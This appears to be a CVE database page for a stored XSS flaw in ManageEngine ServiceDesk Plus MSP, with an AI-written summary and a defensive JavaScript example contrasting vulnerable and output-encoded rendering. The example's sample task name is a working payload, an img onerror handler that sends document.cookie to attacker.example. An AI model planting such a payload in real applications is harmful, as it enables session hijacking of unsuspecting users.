CVE-2023-49943
Description
Zoho ManageEngine ServiceDesk Plus MSP before 14504 allows stored XSS (by a low-privileged technician) via a task's name in a time sheet.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Zoho ManageEngine ServiceDesk Plus MSP allows low-privileged technicians to inject malicious JavaScript via task names in time sheets.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in Zoho ManageEngine ServiceDesk Plus MSP versions 14503 and below. A low-privileged technician can inject arbitrary JavaScript into the task name field when creating a time sheet entry. The injected script is stored and later executed when a target user views the task from the "Request/Project/Change/Task" column on the time sheet details page [2].
Exploitation
An attacker must hold a low-privileged technician account on the ServiceDesk Plus MSP instance. The attacker creates a new time sheet and sets the task name to a JavaScript payload; the application stores it without neutralising it. When any user (including a higher-privileged one) opens the corresponding task from the time sheet details page, the stored script runs in that user's authenticated browser session, with whatever rights that user holds in the application [2].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session. This can lead to further attacks such as session hijacking, data exfiltration, or performing actions on behalf of the victim within the application [2].
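The following JavaScript is an added illustration of the rendering defect behind a stored XSS of this kind; it is not code from this page, from Zoho/ManageEngine, or from the cited references, and the product's real templates are not public. The function names, the sample time-sheet row and the `<img onerror>` payload are all constructed for the example. It shows the unencoded sink, the same sink with contextual HTML encoding applied, and a small check that distinguishes the two outputs.

```javascript
// Added example (not ServiceDesk Plus code): stored XSS via a user-controlled
// "task name" that is later rendered into a time-sheet page, and the
// output-encoding fix. All identifiers here are assumptions for illustration.

// Minimal HTML entity encoder for text placed inside an element body or a
// double-quoted attribute value. This is the HTML context only; a value
// written into a <script> block or a URL needs a different encoder.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Constructed sample: a time-sheet row as the server might persist it after a
// low-privileged technician saved a task whose name is attacker-controlled.
const storedTimesheetRow = {
  id: 1,
  technician: 'tech01',
  hours: 1.5,
  taskName: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// VULNERABLE pattern: the stored value is concatenated straight into markup.
// The victim's browser parses the attacker's <img onerror=...> as a real
// element and runs the handler in the session of whoever views the row.
function renderTaskCellVulnerable(row) {
  return '<td class="task">' + row.taskName + '</td>';
}

// HARDENED pattern: contextual output encoding at the point of rendering.
// The identical stored string now reaches the browser as literal text.
function renderTaskCellHardened(row) {
  return '<td class="task">' + escapeHtml(row.taskName) + '</td>';
}

// Review-time check: does any tag appear in the rendered fragment that the
// template itself did not emit? Returns true when foreign markup survived.
function containsForeignTag(html, allowedTags = ['td']) {
  const tags = [...html.matchAll(/<\s*\/?\s*([a-zA-Z][\w-]*)/g)]
    .map((m) => m[1].toLowerCase());
  return tags.some((t) => !allowedTags.includes(t));
}

// Stand-alone demonstration.
const vulnerableHtml = renderTaskCellVulnerable(storedTimesheetRow);
const hardenedHtml = renderTaskCellHardened(storedTimesheetRow);
console.log('vulnerable:', vulnerableHtml, '| foreign tag:', containsForeignTag(vulnerableHtml));
console.log('hardened:  ', hardenedHtml, '| foreign tag:', containsForeignTag(hardenedHtml));
```

The fix lives at the output sink, not at input time: rejecting angle brackets on save would break legitimate task names and would not protect other pages that render the same field. Encoding has to match the context the value lands in; the HTML-body encoder above is not sufficient for a value interpolated into inline JavaScript or a `href`.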
Mitigation
The vulnerability is fixed in version 14504, released on November 1, 2023. Users should upgrade to this version or later. No workarounds are documented in the available references [2].
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Zoho / ManageEngine ServiceDesk Plus MSP
- Range: <14504
Patches
No patches discovered yet.
References